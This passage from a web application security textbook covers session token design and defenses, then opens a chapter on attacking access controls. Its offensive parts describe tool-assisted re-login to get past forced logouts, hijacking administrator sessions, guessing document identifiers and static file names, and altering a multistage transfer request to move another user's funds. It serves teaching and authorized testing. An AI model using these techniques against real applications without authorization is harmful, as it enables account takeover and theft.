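The formula just described can be sketched as follows. This is a minimal illustration, assuming Python's `secrets` module as the pseudo-random source and SHA-256 as the hash; the function name, parameter names, and the `|` separator are choices made here rather than anything prescribed by the formula.

```python
import hashlib
import secrets
import time

# Secret known only to the server; regenerated each time the process starts.
SERVER_SECRET = secrets.token_bytes(32)


def generate_token(source_ip, source_port, user_agent, now_ms=None):
    """Hash a random value, request-specific data, and the server secret."""
    if now_ms is None:
        now_ms = int(time.time() * 1000)
    random_part = secrets.token_bytes(32)        # cryptographically strong source
    material = b"|".join([
        random_part,                             # most variable items first
        str(now_ms).encode(),
        f"{source_ip}:{source_port}".encode(),
        user_agent.encode("utf-8", "replace"),
        SERVER_SECRET,
    ])
    return hashlib.sha256(material).hexdigest()
```

The resulting 64-character hexadecimal string carries no recoverable meaning or structure; everything about the session is looked up on the server using it as a key.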

TIP Having decided upon an algorithm for generating session tokens, a useful

“thought experiment” is to imagine that your source of pseudo-randomness is

totally broken and always returns the same value. In this eventuality, would an

attacker who obtains a large sample of tokens from the application be able to

extrapolate tokens issued to other users? Using the formula described here,

this will in general be highly unlikely, even with full knowledge of the algorithm

used. The source IP, port number, User-Agent header, and time of request

together generate a vast amount of entropy. And even with full knowledge of

these, the attacker will not be able to produce the corresponding token without

knowing the secret string used by the server.

Protect Tokens throughout Their Lifecycle

Having created a robust token whose value cannot be predicted, this token

needs to be protected throughout its lifecycle from creation to disposal, to

ensure that it is not disclosed to anyone other than the user to whom it is

issued:

■■

The token should only ever be transmitted over HTTPS. Any token

transmitted in clear text should be regarded as tainted — that is, as not

providing assurance of the user’s identity. If HTTP cookies are being

used to transmit tokens, these should be flagged as secure to prevent

the user’s browser from ever transmitting them over HTTP. If feasible,

HTTPS should be used for every page of the application, including sta-

tic content such as help pages, images, and so on. If this is not desired

and an HTTP service is still implemented, the application should redi-

rect any requests for sensitive content (including the login page) back to

the HTTPS service. Static resources such as help pages are not usually

sensitive and may be accessed without any authenticated session;

hence, the use of secure cookies can be backed up using cookie scope

instructions to prevent tokens being submitted in requests for these

resources.

■■

Session tokens should never be transmitted in the URL, as this provides

a trivial vehicle for session fixation attacks and results in tokens appear-

ing in numerous logging mechanisms. In some cases, developers use

this technique to implement sessions in browsers that have cookies disabled. However, a better means of achieving this is to use POST requests for all navigation and store tokens in a hidden field of an HTML form.

■■

Logout functionality should be implemented. This should dispose of all

session resources held on the server and invalidate the session token.

■■

Session expiration should be implemented after a suitable period of

inactivity (e.g., 10 minutes). This should result in the same behavior as

if the user had explicitly logged out.

■■

Concurrent logins should be prevented. Each time a user logs in, a dif-

ferent session token should be issued, and any existing session belong-

ing to the user should be disposed of as if she had logged out from it.

When this occurs, the old token may be stored for a period and any

subsequent requests received using the token should return a security

alert to the user stating that the session has been terminated because

she has logged in from a different location.

■■

If the application contains any administrative or diagnostic functional-

ity that enables session tokens to be viewed, this functionality should

be robustly defended against unauthorized access. In most cases, there

is no necessity for this functionality to display the actual session token

at all — rather, it should contain sufficient details about the owner of

the session for any support and diagnostic tasks to be performed, with-

out divulging the session token being submitted by the user to identify

her session.

■■

The domain and path scope of an application’s session cookies should

be set as restrictively as possible. Cookies with overly liberal scope are

often generated by poorly configured web application platforms or web

servers, rather than by the application developers themselves. There

should be no other web applications or untrusted functionality accessi-

ble via domain names or URL paths that are included within the scope

of the application’s cookies. Particular attention should be paid to any

existing subdomains to the domain name that is used to access the

application. In some cases, to ensure that this vulnerability does not

arise, it may be necessary to modify the domain- and path-naming

scheme employed by the various applications in use within the

organization.
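
Several of the lifecycle measures above (server-side logout, inactivity expiration, prevention of concurrent logins, and a restrictively scoped secure cookie) can be sketched in one small session store. The class, its method names, and the example cookie path are assumptions made for illustration; the 10-minute timeout is the example value given in the list.

```python
import secrets
import time


class SessionStore:
    """Hypothetical server-side store; tokens are opaque keys with no meaning."""

    def __init__(self, idle_timeout=600):
        self.idle_timeout = idle_timeout         # seconds (10 minutes)
        self.sessions = {}                       # token -> {"user", "last_seen"}
        self.by_user = {}                        # username -> current token

    def login(self, user, now=None):
        now = time.time() if now is None else now
        old = self.by_user.get(user)
        if old is not None:
            self.logout(old)                     # no concurrent logins
        token = secrets.token_hex(32)
        self.sessions[token] = {"user": user, "last_seen": now}
        self.by_user[user] = token
        return token

    def validate(self, token, now=None):
        now = time.time() if now is None else now
        session = self.sessions.get(token)
        if session is None:
            return None
        if now - session["last_seen"] > self.idle_timeout:
            self.logout(token)                   # expiry behaves like a logout
            return None
        session["last_seen"] = now
        return session["user"]

    def logout(self, token):
        session = self.sessions.pop(token, None)
        if session and self.by_user.get(session["user"]) == token:
            del self.by_user[session["user"]]


def session_cookie(token, app_path="/apps/secure/foo-app/"):
    """Set-Cookie value restricted to HTTPS and to the application's own path."""
    return f"sessionId={token}; Path={app_path}; Secure"
```

Because expiry and a second login both route through `logout`, all three events leave the server in the same state, which is the property the list asks for.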

Specific measures should be taken to defend the session management mech-

anism against the variety of attacks with which the application’s users may

find themselves targeted:

■■

The application’s codebase should be rigorously audited to identify and

remove any cross-site scripting vulnerabilities (see Chapter 12). Most

such vulnerabilities can be exploited to attack session management

mechanisms. In particular, stored (or second-order) XSS attacks can usu-

ally be exploited to defeat every conceivable defense against session

misuse and hijacking.

■■

Arbitrary tokens submitted by users that the server does not recognize

should not be accepted. The token should be immediately canceled

within the browser, and the user should be returned to the application’s

start page.

■■

Cross-site request forgery and other session attacks can be made more

difficult by requiring two-step confirmation and/or reauthentication

before critical actions such as funds transfers are carried out.

■■

Cross-site request forgery attacks can be defended against by not rely-

ing solely upon HTTP cookies for transmitting session tokens. Using

the cookie mechanism introduces the vulnerability because cookies are

automatically submitted by the browser regardless of what caused the

request to take place. If tokens are always transmitted in a hidden field

of an HTML form, then an attacker cannot create a form whose submis-

sion will cause an unauthorized action unless he already knows the

value of the token, in which case he can simply perform a trivial hijack-

ing attack. Per-page tokens can also help prevent these attacks (see the

following section).

■■

A fresh session should always be created after successful authentica-

tion, to mitigate the effects of session fixation attacks. Where an applica-

tion does not use authentication but does allow sensitive data to be

submitted, the threat posed by fixation attacks is harder to address.

One possible approach is to keep the sequence of pages where sensitive

data is submitted as short as possible, and either (a) create a new ses-

sion at the first page of this sequence (where necessary, copying from

the existing session any required data, such as the contents of a shop-

ping cart), or (b) use per-page tokens (described in the following sec-

tion) to prevent an attacker who knows the token used in the first page

from accessing subsequent pages. Except where strictly necessary, per-

sonal data should not be displayed back to the user at all. Even where

this is required (e.g., a “confirm order” page showing addresses), sensi-

tive items such as credit card numbers and passwords should never be

displayed back to the user and should always be masked within the

source of the application’s response.
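
Three of the measures above can be sketched together: issuing a fresh session after login, rejecting tokens the server does not recognize, and requiring a value carried in a hidden form field. Note the assumption: this sketch uses a variation in which a separate per-session value, rather than the session token itself, travels in the hidden field. All names are hypothetical.

```python
import hmac
import secrets

sessions = {}  # session token -> {"user": ..., "form_token": ...}


def start_authenticated_session(user, old_token=None):
    """Discard any pre-login session and issue a fresh token after login."""
    sessions.pop(old_token, None)
    token = secrets.token_hex(32)
    sessions[token] = {"user": user, "form_token": secrets.token_hex(32)}
    return token


def hidden_field(session_token):
    """HTML for the hidden form field carrying the anti-forgery value."""
    value = sessions[session_token]["form_token"]
    return f'<input type="hidden" name="form_token" value="{value}">'


def accept_request(session_token, submitted_form_token):
    """Accept only known sessions whose hidden-field value matches."""
    session = sessions.get(session_token)
    if session is None:
        return False                             # unrecognized tokens are rejected
    expected = session["form_token"].encode()
    supplied = (submitted_form_token or "").encode()
    return hmac.compare_digest(expected, supplied)
```

A forged cross-site request arrives with the victim's cookie attached automatically, but without the hidden-field value, so `accept_request` refuses it.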

Per-Page Tokens

Finer-grained control over sessions can be achieved, and many kinds of session

attacks made more difficult or impossible, by using per-page tokens in addition to

session tokens. Here, a new page token is created every time a user requests an

application page (as opposed to an image, for example) and is passed to the client

in a cookie or a hidden field of an HTML form. Each time the user makes a

request, the page token is validated against the last value issued, in addition to the

normal validation of the main session token. In the case of a non-match, the entire

session is terminated. Many of the most security-critical web applications on the

Internet, such as online banks, employ per-page tokens to provide increased pro-

tection for their session management mechanism, as shown in Figure 7-5.

Figure 7-5: Per-page tokens used in a banking application

While the use of per-page tokens does impose some restrictions on navigation

(for example, on use of the back and forward buttons and multi-window brows-

ing), it effectively prevents session fixation attacks and ensures that the simulta-

neous use of a hijacked session by a legitimate user and an attacker will quickly

be blocked after both have made a single request. Per-page tokens can also be

leveraged to track the user’s location and movement through the application,

and used to detect attempts to access functions out of a defined sequence, help-

ing to protect against certain access control defects (see Chapter 8).
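
The per-page token scheme can be sketched as follows. This is a minimal illustration with invented names: each served page rotates the token, each request must present the last value issued, and any mismatch terminates the whole session.

```python
import secrets


class PageTokenSession:
    """Hypothetical session that also tracks the last page token issued."""

    def __init__(self):
        self.active = True
        self.page_token = None

    def issue_page(self):
        """Called when an application page is served; returns the new token."""
        self.page_token = secrets.token_hex(16)
        return self.page_token

    def handle_request(self, submitted_page_token):
        """Validate the page token, then rotate it; terminate on mismatch."""
        if not self.active:
            return None
        if self.page_token is None or submitted_page_token != self.page_token:
            self.active = False                  # entire session is terminated
            self.page_token = None
            return None
        return self.issue_page()
```

If a legitimate user and an attacker share a hijacked session, whichever of them submits a stale page token triggers termination, which is why simultaneous use is blocked so quickly.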

Log, Monitor, and Alert

The application’s session management functionality should be closely inte-

grated with its mechanisms for logging, monitoring, and alerting, in order to

provide suitable records of anomalous activity and enable administrators to

take defensive actions where necessary:

■■

The application should monitor requests that contain invalid tokens.

Except in the most trivially predictable cases, a successful attack

attempting to guess the tokens issued to other users will typically

involve issuing large numbers of requests containing invalid tokens,

leaving a noticeable mark in the application’s logs.

■■

Brute-force attacks against session tokens are difficult to block altogether,

because there is no particular user account or session that can be disabled

to stop the attack. One possible action is to block source IP addresses for

a period when a number of requests containing invalid tokens have been

received. However, this may be ineffective when one user’s requests orig-

inate from multiple IP addresses (e.g., AOL users) or when multiple

users’ requests originate from the same IP address (e.g., users behind a

proxy or a firewall performing network address translation).

■■

Even if brute-force attacks against sessions cannot be effectively pre-

vented in real time, keeping detailed logs and alerting administrators

enables them to investigate the attack and take appropriate action

where they are able to.

■■

Wherever possible, users should be alerted to anomalous events relat-

ing to their session — for example, concurrent logins or apparent

hijacking (detected using per-page tokens). Even though a compromise

may already have occurred, this enables the user to check whether any

unauthorized actions such as funds transfers have taken place.
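
The monitoring and temporary blocking described above can be sketched with a sliding window of invalid-token events per source IP address. The thresholds are illustrative values chosen here, and the `alerts` list is a stand-in for whatever alerting channel the application actually uses.

```python
import time
from collections import defaultdict, deque


class InvalidTokenMonitor:
    """Counts invalid-token requests per source IP inside a sliding window."""

    def __init__(self, threshold=20, window=60, block_for=300):
        self.threshold = threshold               # illustrative values, in seconds
        self.window = window
        self.block_for = block_for
        self.events = defaultdict(deque)         # ip -> timestamps of bad tokens
        self.blocked_until = {}                  # ip -> time the block lifts
        self.alerts = []                         # stand-in for a real alert channel

    def is_blocked(self, ip, now=None):
        now = time.time() if now is None else now
        return self.blocked_until.get(ip, 0) > now

    def record_invalid_token(self, ip, now=None):
        now = time.time() if now is None else now
        recent = self.events[ip]
        recent.append(now)
        while recent and recent[0] <= now - self.window:
            recent.popleft()                     # forget events outside the window
        if len(recent) >= self.threshold and not self.is_blocked(ip, now):
            self.blocked_until[ip] = now + self.block_for
            self.alerts.append((now, ip, len(recent)))
```

As the list notes, keying on the source IP address is imperfect, so the alert record matters at least as much as the block itself.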

Reactive Session Termination

The session management mechanism can be leveraged as a highly effective

defense against many kinds of other attacks against the application. Some

security-critical applications such as online banking are extremely aggressive in

terminating a user’s session every time the user submits some anomalous

request — for example, any request containing a modified hidden HTML form

field or URL query string parameter, any request containing strings associated

with SQL injection or cross-site scripting attacks, and any user input that would

normally have been blocked by client-side checks such as length restrictions.

Of course, any actual vulnerabilities that may be exploited using such

requests need to be addressed at source. But forcing users to reauthenticate

every time they submit an invalid request can slow down the process of prob-

ing the application for vulnerabilities by many orders of magnitude, even

where automated techniques are employed. If residual vulnerabilities do still

exist, they are far less likely to be discovered by anyone in the field.

Where this kind of defense is implemented, it should also be possible to switch

it off easily for testing purposes. If a legitimate penetration test

of the application is slowed down in the same way as a real-world attacker,

then its effectiveness is dramatically reduced, and it is very likely that the pres-

ence of the mechanism will result in more vulnerabilities remaining in pro-

duction code than if the mechanism were absent.
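
A reactive termination check with the recommended off switch might look like the sketch below. The patterns are deliberately crude examples, and the function names, the default length limit, and the `reactive_termination` flag are assumptions made for illustration.

```python
import re

# Illustrative patterns only; real deployments would tune these carefully.
SUSPICIOUS = [re.compile(p, re.IGNORECASE) for p in (
    r"<script\b",                # common cross-site scripting probe
    r"'\s*or\s+'?1'?\s*=",       # common SQL injection probe
    r"\bunion\s+select\b",
)]


def is_anomalous(params, max_lengths):
    """Flag probe strings and values longer than the client-side limit."""
    for name, value in params.items():
        if len(value) > max_lengths.get(name, 256):
            return True
        if any(p.search(value) for p in SUSPICIOUS):
            return True
    return False


def handle(session, params, max_lengths, reactive_termination=True):
    """Terminate the session on an anomalous request unless switched off."""
    if is_anomalous(params, max_lengths):
        if reactive_termination:
            session["active"] = False            # user must reauthenticate
        return "rejected"
    return "ok"
```

With the flag disabled, anomalous requests are still rejected but the tester's session survives, so an authorized test is not slowed down.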

HACK STEPS

If the application you are attacking uses this kind of defensive measure, you

may find that probing the application for many kinds of common vulnerability

is extremely time-consuming, and the mind-numbing need to log in after each

failed test and renavigate to the point of the application you were looking at

quickly leads you to give up.

In this situation, you can often use automation to tackle the problem. When

using Burp Intruder to perform an attack, you can use the Obtain Cookie

feature to perform a fresh login before sending each test case, and use the new

session token (provided that the login is single-stage). When browsing and

probing the application manually, you can use the extensibility features of Burp

Proxy via the IBurpExtender interface. You can create an extension which

detects when the application has performed a forced logout, automatically logs

back in to the application, and returns the new session and page to the

browser, optionally with a pop-up message to inform you of what has occurred.

While this by no means removes the problem altogether, in certain cases it can

mitigate it substantially.
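The "fresh login before each test case" idea can be sketched independently of any particular tool. The following Python outline is only an illustration under stated assumptions: it is not Burp's extension API, and `login` and `send` are hypothetical callables that you would write for the target application (one performs a single-stage login and returns a session token, the other submits one test case using that token).

```python
from typing import Callable, Iterable, List, Tuple


def probe_with_fresh_sessions(
    payloads: Iterable[str],
    login: Callable[[], str],
    send: Callable[[str, str], str],
) -> List[Tuple[str, str]]:
    """Log in afresh before every test case.

    Because each payload is sent in its own session, a forced logout
    triggered by one test case cannot invalidate the next one.
    """
    results = []
    for payload in payloads:
        token = login()                      # new session token for this test only
        response = send(token, payload)      # submit the test case in that session
        results.append((payload, response))
    return results
```

The cost is one extra login per test case, which is usually far cheaper than logging in by hand after every failed probe.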

Chapter Summary

The session management mechanism provides a rich source of potential vul-

nerabilities for you to target when formulating your attack against an applica-

tion. Because of its fundamental role in enabling the application to identify the

same user across multiple requests, a broken session management function

usually provides the keys to the kingdom. Jumping into other users’ sessions

is good; hijacking an administrator’s session is even better, and will typically

enable you to compromise the entire application.

You can expect to encounter a wide range of defects in real-world session

management functionality. When bespoke mechanisms are employed, the

possible weaknesses and avenues of attack may appear to be endless. The

most important lesson to draw from this topic is to be patient and determined.

Many session management mechanisms that appear to be robust on first

inspection can be found wanting when analyzed closely. Deciphering the

method which an application uses to generate its sequence of seemingly ran-

dom tokens may take time and ingenuity. But given the reward, this is usually

an investment well worth making.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. You log in to an application and the server sets the following cookie:

Set-cookie: sessid=amltMjM6MTI0MToxMTk0ODcwODYz;

An hour later, you log in again and receive the following:

Set-cookie: sessid=amltMjM6MTI0MToxMTk0ODc1MTMy;

What can you deduce about these cookies?

2. An application employs six-character alphanumeric session tokens and

five-character alphanumeric passwords. Both are randomly generated

according to an unpredictable algorithm. Which of these is likely to be

the more worthwhile target for a brute force guessing attack? List all of

the different factors that may be relevant to your decision.

3. You log in to an application at the following URL:

https://foo.wahh-app.com/login/home.php

and the server sets the following cookie:

Set-cookie: sessionId=1498172056438227; domain=foo.wahh-app.com; path=/login; HttpOnly;

You then visit a range of other URLs. Which of the following will your

browser submit the sessionId cookie to? (Select all that apply.)

(a) https://foo.wahh-app.com/login/myaccount.php

(b) https://bar.wahh-app.com/login

(d) http://foo.wahh-app.com/login/myaccount.php

(e) http://foo.wahh-app.com/logintest/login.php

(f) https://foo.wahh-app.com/logout

(g) https://wahh-app.com/login/

(h) https://xfoo.wahh-app.com/login/myaccount.php

4. The application you are targeting uses per-page tokens, in addition to

the primary session token. If a per-page token is received out of

sequence, then the entire session is invalidated. Suppose that you dis-

cover some defect that enables you to predict or capture the tokens

issued to other users who are currently accessing the application. Are

you able to hijack their sessions?

5. You log in to an application and the server sets the following cookie:

Set-cookie: sess=ab11298f7eg14;

When you click the logout button, this causes the following client-side

script to execute:

document.cookie="sess=";
document.location="/";

What conclusion would you draw from this behavior?

CHAPTER 8

Attacking Access Controls

Within the application’s core security mechanisms, access controls are
logically built upon authentication and session management. So far, you have
seen how an application can first verify a user’s identity and then confirm
that a particular sequence of requests that it receives originated from the
same user. The primary reason that the application needs to do these things,
in terms of security at least, is that it needs a way of deciding whether it
should permit a given request to perform its attempted action or access the
resources that it is requesting. Access controls are a critical defense
mechanism within the application because they are responsible for making these
key decisions. When they are defective, an attacker can often compromise the
entire application, taking control of administrative functionality and
accessing sensitive data belonging to every other user.

As we noted in Chapter 1, broken access controls are among the most commonly
encountered categories of web application vulnerability, affecting a massive
78% of the applications recently tested by the authors. Somewhat incredibly,
it is extremely common to encounter applications that go to all the trouble of
implementing robust mechanisms for authentication and session management, only
to squander that investment by neglecting to build any effective access
controls upon them.

Access control vulnerabilities are conceptually very simple: the application
is letting you do something you shouldn’t be able to. The differences between
separate flaws really come down to the different ways in which this core
defect is manifested, and the different techniques you need to employ to
detect it. We will describe all of these techniques, showing how you can
exploit different kinds of behavior within an application to perform
unauthorized actions and access protected data.

Common Vulnerabilities

Access controls can be divided into two broad categories: vertical and horizontal.

Vertical access controls allow different types of users to access different

parts of the application’s functionality. In the simplest case, this typically

involves a division between ordinary users and administrators. In more com-

plex cases, vertical access controls may involve fine-grained user roles grant-

ing access to specific functions, with each user being allocated to a single role,

or a combination of different roles.

Horizontal access controls allow users to access a certain subset of a wider

range of resources of the same type. For example, a web mail application may

allow you to read your email but no one else’s; an online bank may let you

transfer money out of your account only; and a workflow application may

allow you to update tasks assigned to you but only read tasks assigned to

other people.

In many cases, vertical and horizontal access controls are intertwined. For

example, an enterprise resource planning application may allow each accounts

payable clerk to pay invoices for a specific organizational unit and no other. The

accounts payable manager, on the other hand, may be allowed to pay invoices

for any unit. Similarly, clerks may be able to pay invoices for small amounts,

while larger invoices must be paid by the manager. The finance director may be

able to view invoice payments and receipts for every organizational unit in the

company but may not be permitted to pay any invoices at all.
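The invoice example shows how the two kinds of control combine in a single decision. The sketch below expresses those rules in Python purely for illustration. The role names, the `CLERK_LIMIT` threshold, and the viewing rights of clerks and managers are assumptions made for the example; only the payment rules and the director's view-only access come from the scenario described above.

```python
from dataclasses import dataclass

CLERK_LIMIT = 1000  # hypothetical boundary between "small" and "large" invoices


@dataclass
class User:
    role: str  # "clerk", "manager", or "director"
    unit: str  # organizational unit the user belongs to


@dataclass
class Invoice:
    unit: str
    amount: int


def can_pay(user: User, invoice: Invoice) -> bool:
    if user.role == "manager":
        return True  # vertical: the manager may pay invoices for any unit
    if user.role == "clerk":
        same_unit = invoice.unit == user.unit        # horizontal: own unit only
        small_enough = invoice.amount <= CLERK_LIMIT  # vertical: small amounts only
        return same_unit and small_enough
    return False  # the director, and any unknown role, may not pay at all


def can_view(user: User, invoice: Invoice) -> bool:
    if user.role == "director":
        return True  # may view every unit, despite being unable to pay
    if user.role == "manager":
        return True  # assumption: managers can view whatever they can pay
    # assumption: clerks can view invoices for their own unit only
    return user.role == "clerk" and invoice.unit == user.unit
```

A flaw in either half of the clerk's check is a privilege escalation: dropping the unit comparison is a horizontal failure, and dropping the amount comparison is a vertical one.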

Access controls are broken if any user is able to access functionality or

resources for which he is not authorized. There are two main types of attack

against access controls, corresponding to the two categories of control:

■ Vertical privilege escalation occurs when a user can perform functions

that their assigned role does not permit them to. For example, if an

ordinary user can perform administrative functions or a clerk is able to

pay invoices of any size, then access controls are broken.

■ Horizontal privilege escalation occurs when a user can view or modify

resources to which he is not entitled. For example, if you can use a web

mail application to read other people’s email, or if a payment clerk can

process invoices for an organizational unit other than his own, then

access controls are broken.

It is common to find cases where a vulnerability in the application’s hori-

zontal separation of privileges can lead immediately to a vertical escalation

attack. For example, if a user finds a way to set a different user’s password,

then the user can attack an administrative account and take control of the

application.

In the cases described so far, broken access controls enable users who have

authenticated themselves to the application in a particular user context to per-

form actions or access data for which that context does not authorize them.

However, in the most serious cases of broken access control, it may be possible

for completely unauthorized users to gain access to functionality or data that

is intended to be accessed only by privileged authenticated users.

Completely Unprotected Functionality

In many cases of broken access controls, sensitive functionality and resources

can be accessed by anyone who knows the relevant URL. For example, there

are many applications in which anyone who visits a specific URL is able to

make full use of its administrative functions:

https://wahh-app.com/admin/

In this situation, the application typically enforces access control only to the

following extent: users who have logged in as administrators see a link to this

URL on their user interface, while other users do not. This cosmetic difference

is the only mechanism in place to “protect” the sensitive functionality from

unauthorized use.

Sometimes, the URL that grants access to powerful functions may be less

easy to guess, and may even be quite cryptic, for example:

https://wahh-app.com/menus/secure/ff457/DoAdminMenu2.jsp

Here, access to administrative functions is protected by the assumption that

an attacker will not know or discover this URL. The application is harder for a

complete outsider to compromise, because they are less likely to guess the

URL by which they can do so.

COMMON MYTH “No low-privileged users will know that URL. We don’t

reference it anywhere within the application.”

In the example just described, the absence of any genuine access control still

constitutes a serious vulnerability, regardless of how easy it would be to guess

the URL. URLs do not have the status of secrets, either within the application

itself or in the hands of its users. They are displayed on-screen, and appear in

browser histories and the logs of web servers and proxy servers. Users may write

them down, bookmark them, or email them around. They are not normally

changed periodically, as passwords should be. When users change job roles, and

their access to administrative functionality needs to be withdrawn, there is no

way to delete their knowledge of a particular URL.

In some applications where sensitive functionality is hidden behind URLs

that are not trivial to guess, an attacker may often be able to identify these via

close inspection of client-side code. Many applications use JavaScript to build

the user interface dynamically within the client. This typically works by set-

ting various flags regarding the user’s status, and then adding individual ele-

ments to the UI on the basis of these. For example:

var isAdmin = false;
...
if (isAdmin)
{
    adminMenu.addItem("/menus/secure/ff457/addNewPortalUser2.jsp",
        "create a new user");
}

Here, an attacker can simply review the JavaScript to identify URLs for

administrative functionality and attempt to access these. In other cases, HTML

comments may contain references to or clues about URLs that are not linked

from on-screen content. See Chapter 4 for a discussion of the various tech-

niques by which an attacker can gather information about hidden content

within the application.
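Reviewing client-side script for URLs can be partly automated. The following Python sketch pulls path-like string literals out of JavaScript source that you have already saved locally. The regular expression and its list of file extensions are illustrative assumptions, and a pattern this simple will miss URLs that are assembled from fragments at runtime, so treat its output as a starting point for manual review.

```python
import re
from typing import List

# Quoted string literals that begin with "/" and end in a common server-side
# extension. The extension list is an assumption chosen for illustration.
PATH_LITERAL = re.compile(r"""["'](/[^"'\s]+\.(?:jsp|php|aspx?|do|cgi))["']""")


def find_hidden_paths(script_source: str) -> List[str]:
    """Return unique path-like literals in the order they first appear."""
    found: List[str] = []
    for path in PATH_LITERAL.findall(script_source):
        if path not in found:
            found.append(path)
    return found
```

Run against the script shown earlier, this returns the single administrative path passed to `adminMenu.addItem`, even though the `isAdmin` flag prevents the menu item from being displayed.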

Identifier-Based Functions

When a function of an application is used to gain access to a specific resource,

it is very common to see an identifier for the requested resource being passed

to the server in a request parameter, either within the URL query string or the

body of a POST request. For example, an application may use the following

URL to display a specific document belonging to a particular user:

https://wahh-app.com/ViewDocument.php?docid=1280149120

When the user who owns the document is logged in, a link to this URL is

displayed on the user’s My Documents page. Other users do not see the link.

However, if access controls are broken, then any user who requests the rele-

vant URL may be able to view the document in exactly the same way as the

authorized user.

TIP This type of vulnerability often arises when the main application is

interfacing to an external system or back-end component. It can be difficult to

share a session-based security model between different systems that may be

based on diverse technologies. Faced with this problem, developers frequently

take a shortcut and move away from that model, using client-submitted

parameters to make access control decisions.

In this example, an attacker seeking to gain unauthorized access needs to

know not only the name of the application page (ViewDocument.php) but also

the identifier of the document he wishes to view. Sometimes, resource identi-

fiers are generated in a highly unpredictable manner — for example, they may

be randomly chosen GUIDs. In other cases, they may be easily guessed — for

example, they may be sequentially generated numbers. However, the applica-

tion is vulnerable in both cases. As described previously, URLs do not have the

status of secrets, and the same applies to resource identifiers. Often, an

attacker wishing to discover the identifiers of other users’ resources will find

some location within the application that discloses these, such as access logs.

Even where an application’s resource identifiers cannot be easily guessed, it is

still vulnerable if it fails to properly control access to those resources. In cases

where the identifiers are easily predicted, the problem is even more serious

and more easily exploited.
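The underlying defect is easiest to see on the server side. The sketch below is a deliberately simplified Python model, not the code of any real application: `DOCUMENT_OWNERS` and both function names are hypothetical, and the second identifier is invented for the example. The broken handler checks only that the requested document exists, while the corrected one also compares its owner with the user established by the session.

```python
# Hypothetical store mapping document identifiers to their owners.
DOCUMENT_OWNERS = {1280149120: "alice", 1280149121: "bob"}


def view_document_vulnerable(session_user: str, docid: int) -> bool:
    """Broken: any authenticated user may view any document that exists."""
    return docid in DOCUMENT_OWNERS


def view_document_checked(session_user: str, docid: int) -> bool:
    """Grants access only when the session's user owns the document."""
    return DOCUMENT_OWNERS.get(docid) == session_user
```

Note that the unpredictability of the identifier plays no part in the corrected check. The decision rests entirely on who is asking, which is why the application remains vulnerable in both cases unless such a check is present.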

TIP Application logs are often a gold mine of information, and may contain

numerous items of data that can be used as identifiers to probe functionality

that is accessed in this way. Identifiers commonly found within application logs

include: usernames, user ID numbers, account numbers, document IDs, user

groups and roles, and email addresses.

NOTE In addition to being used as references to data-based resources

within the application, this kind of identifier is also often used to refer to

functions of the application itself. As you saw in Chapter 4, an application may

deliver different functions via a single page, which accepts a function name or

identifier as a parameter. Again in this situation, access controls may run no

deeper than the presence or absence of specific URLs within the interfaces

of different types of user. If an attacker can determine the identifier for a

sensitive function, he may be able to access it in just the same way as a

more privileged user.

Multistage Functions

Many kinds of functions within an application are implemented across several

stages, involving multiple requests being sent from the client to the server. For

example, a function to add a new user may involve choosing this option from

a user maintenance menu, selecting the department and user role from drop-

down lists, and then entering the new username, initial password, and other

information.

It is common to encounter applications in which efforts have been made to

protect this kind of sensitive functionality from unauthorized access but where

the access controls employed are broken because of flawed assumptions about

the ways in which the functionality will be used.

In the previous example, when a user attempts to load the user maintenance

menu, and chooses the option to add a new user, the application may verify

that the user has the required privileges, and block access if the user does not.

However, if an attacker proceeds directly to the stage of specifying the user’s

department and other details, there may be no effective access control. The

developers unconsciously assumed that any user who reaches the later stages

of the process must have the relevant privileges because this was verified at

the earlier stages. The result is that any user of the application can add a new

administrative user account, and thereby take full control of the application,

gaining access to many other functions whose access control is intrinsically

robust.

The authors have encountered this type of vulnerability even in the most

security-critical web applications, those deployed by online banks. Making a

funds transfer in a banking application typically involves multiple stages,

partly to prevent users from accidentally making mistakes when requesting a

transfer. This multistage process involves capturing different items of data

from the user at each stage. This data is strictly checked when first submitted

and then is usually passed to each subsequent stage, using hidden fields in an

HTML form. However, if the application does not revalidate all of this data at

the final stage, then an attacker can potentially bypass the server’s checks. For

example, the application might verify that the source account selected for the

transfer belongs to the current user and then ask for details about the destination

account and the amount of the transfer. If a user intercepts the final POST request

of this process and modifies the source account number, she can execute

a horizontal privilege escalation and transfer funds out of an account

belonging to a different user.
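The funds transfer flaw can be modeled in a few lines. The following Python sketch is an illustration only: the account data, field names, and function names are all hypothetical. It contrasts a final stage that trusts the source account carried in a hidden form field with one that repeats the ownership check on the value actually submitted.

```python
# Hypothetical mapping of account numbers to their owners.
ACCOUNT_OWNERS = {"1001": "alice", "2002": "bob"}


def stage_one_select_source(session_user: str, source: str) -> bool:
    """First stage: the chosen source account must belong to the current user."""
    return ACCOUNT_OWNERS.get(source) == session_user


def final_stage_vulnerable(session_user: str, form: dict) -> str:
    """Broken: assumes the hidden 'source' field is unchanged since stage one."""
    return f"moved {form['amount']} from {form['source']} to {form['dest']}"


def final_stage_revalidated(session_user: str, form: dict) -> str:
    """Repeats the ownership check before acting on the submitted data."""
    if ACCOUNT_OWNERS.get(form["source"]) != session_user:
        return "rejected"
    return f"moved {form['amount']} from {form['source']} to {form['dest']}"
```

If alice passes the first stage with her own account and then changes `source` to bob's account number in the final request, the first handler performs the transfer and the second refuses it.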

Static Files

In the majority of cases, users gain access to protected functionality and

resources by issuing requests to dynamic pages that execute on the server. It is

the responsibility of each such page to perform suitable access control checks,

and confirm that the user has the relevant privileges to perform the action that

they are attempting.

However, in some cases, requests for protected resources are made directly

to the static resources themselves, which are located within the web root of the

server. For example, an online publisher may allow users to browse its book

catalog and purchase ebooks for download. Once payment has been made, the

user is directed to a download URL like the following:

https://wahh-books.com/download/0636628104.pdf

Because this is a completely static resource, it does not execute on the server,

and its contents are simply returned directly by the web server. Hence, the

resource itself cannot implement any logic to verify that the requesting user

has the required privileges. When static resources are accessed in this way, it is

highly likely that there are no effective access controls protecting them and

that anyone who knows the URL naming scheme can exploit this to access any

resources they desire. In the present case, the document name looks suspi-

ciously like an ISBN, which would enable an attacker to quickly download

every ebook produced by the publisher!

Certain types of functionality are particularly prone to this kind of problem,

including financial web sites providing access to static documents about com-

panies such as annual reports, software vendors who provide downloadable

binaries, and administrative functionality that provides access to static log

files and other sensitive data collected within the application.

Insecure Access Control Methods

Some applications employ a fundamentally insecure access control model in

which access control decisions are made on the basis of request parameters

submitted by the client. In some versions of this model, the application deter-

mines a user’s role or access level at the time of login and from this point

onwards transmits this information via the client in a hidden form field,

cookie, or preset query string parameter (see Chapter 5). When each subse-

quent request is processed, the application reads this request parameter and

decides what access to grant the user accordingly.

